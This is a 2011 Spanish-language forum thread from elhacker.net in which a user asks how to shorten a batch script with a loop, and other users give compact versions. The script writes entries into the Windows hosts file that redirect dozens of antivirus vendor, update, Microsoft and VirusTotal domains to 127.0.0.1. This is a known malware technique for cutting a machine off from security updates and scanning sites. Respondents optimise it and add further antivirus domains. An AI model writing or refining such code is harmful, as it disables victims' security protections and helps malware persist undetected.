elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [BATCH] Duda sobre ¿Arrays? [Solucionado]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [BATCH] Duda sobre ¿Arrays? [Solucionado]  (Leído 5,232 veces)
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
[BATCH] Duda sobre ¿Arrays? [Solucionado]
« en: 3 Febrero 2011, 22:10 pm »

Mi duda es simple... se puede en BATCH utilizar algun tipo de array?

Se que con una busqueda en google tendria la respuesta.. pero aprovecho que abro este tema y pregunto a aquellos que se consideran buenos en este lenguaje de Scripting... Como acortarias al maximo este codigo?
Código:
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%

Estoy harto de ver estos codigos tan repetitivos en BATCH... y me pregunto... no se pueden acortar con un simple bucle?!

Un saludo :D


« Última modificación: 5 Febrero 2011, 06:25 am por Leo Gutiérrez. » En línea

leogtz
. . .. ... ..... ........ ............. .....................
Colaborador
***
Desconectado Desconectado

Mensajes: 3.069


/^$/


Ver Perfil WWW
Re: [BATCH] Duda sobre ¿Arrays?
« Respuesta #1 en: 3 Febrero 2011, 22:37 pm »

Mi duda es simple... se puede en BATCH utilizar algun tipo de array?


Sí, se pueden "emular" con expansión de variables. set + setlocalenabledelayedexpansion.
Y no los necesitas para tu propósito.

Estoy harto de ver estos codigos tan repetitivos en BATCH... y me pregunto... no se pueden acortar con un simple bucle?!


Sí.

Sin probar:

Código
  1. @echo off
  2. set "hosts=%windir%\System32\drivers\etc\hosts"
  3. for %%_ in (avp.com ca.com customer.symantec.com dispatch.mcafee.com download.mcafee.com f-secure.com kaspersky.com kaspersky-labs.com liveupdate.symantec.com liveupdate.symantecliveupdate.com mast.mcafee.com mcafee.com microsoft.com my-etrust.com nai.com networkassociates.com pandasoftware.com rads.mcafee.com secure.nai.com securityresponse.symantec.com sophos.com symantec.com trendmicro.com updates.symantec.com update.symantec.com us.mcafee.com viruslist.com virustotal.com www.avp.com www.f-secure.com www.grisoft.com www.kaspersky.com www.mcafee.com www.microsoft.com www.moneybookers.com www.my-etrust.com www.nai.com www.networkassociates.com www.pandasoftware.com www.sophos.com www.symantec.com www.trendmicro.com www.virustotal.com) do (
  4. echo 127.0.0.1 %%_ >> %hosts%
  5. )

Si colocaras los sitios en un archivo llamado "sitios.txt", podrías hacer algo como:

Código
  1. @for /f "tokens=*" %%_ in (sitios.txt) do (echo 127.0.0.1 >> %windir%\System32\drivers\etc\hosts)
  2.  
Las dudas sobre Batch van en Scripting.


« Última modificación: 3 Febrero 2011, 22:43 pm por Leo Gutiérrez. » En línea

Código
  1. (( 1 / 0 )) &> /dev/null || {
  2. echo -e "stderrrrrrrrrrrrrrrrrrr";
  3. }
  4.  
http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: [BATCH] Duda sobre ¿Arrays?
« Respuesta #2 en: 4 Febrero 2011, 11:02 am »

Muy buena respuesta, muchas gracias :)
Ya doy el tema por zanjado :)

Las dudas sobre Batch van en Scripting.
Si, obvio, pero no me fije donde estaba posteando :-[ Gracias por moverlo ;)
En línea

Edu


Desconectado Desconectado

Mensajes: 1.082


Ex XXX-ZERO-XXX


Ver Perfil
Re: [BATCH] Duda sobre ¿Arrays?
« Respuesta #3 en: 4 Febrero 2011, 15:44 pm »

y para lo de poner siempre >> %hosts% podes hacer algo asi:

Código:
@echo off
set "hosts=%windir%\System32\drivers\etc\hosts"
(
echo 127.0.0.1    vscan.novirusthanks.org
echo 127.0.0.1    avast.com) >> %hosts%
exit

Que por cierto te faltan esos 2 xD

Edit: Despues me di cuenta q eras vs Karcrack -_- ' ni mires mi respuesta jaja
« Última modificación: 4 Febrero 2011, 15:46 pm por XXX-ZERO-XXX » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda Batch [Solucionado]
Scripting
h0oke 8 5,243 Último mensaje 16 Octubre 2009, 03:26 am
por h0oke
[DUDA-BATCH] Numero de Linea...(SOLUCIONADO)
Scripting
FranciskoAsdf 2 3,941 Último mensaje 21 Noviembre 2009, 22:23 pm
por FranciskoAsdf
Duda con arrays dentro de arrays « 1 2 »
PHP
Servia 11 6,763 Último mensaje 10 Marzo 2011, 09:04 am
por Servia
Duda sobre Arreglos(Arrays)
Java
Senior++ 2 1,962 Último mensaje 7 Diciembre 2012, 17:09 pm
por Senior++
Duda/Error sobre arrays (vectores)
Programación C/C++
Ikuza 1 1,685 Último mensaje 2 Diciembre 2015, 15:03 pm
por class_OpenGL
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines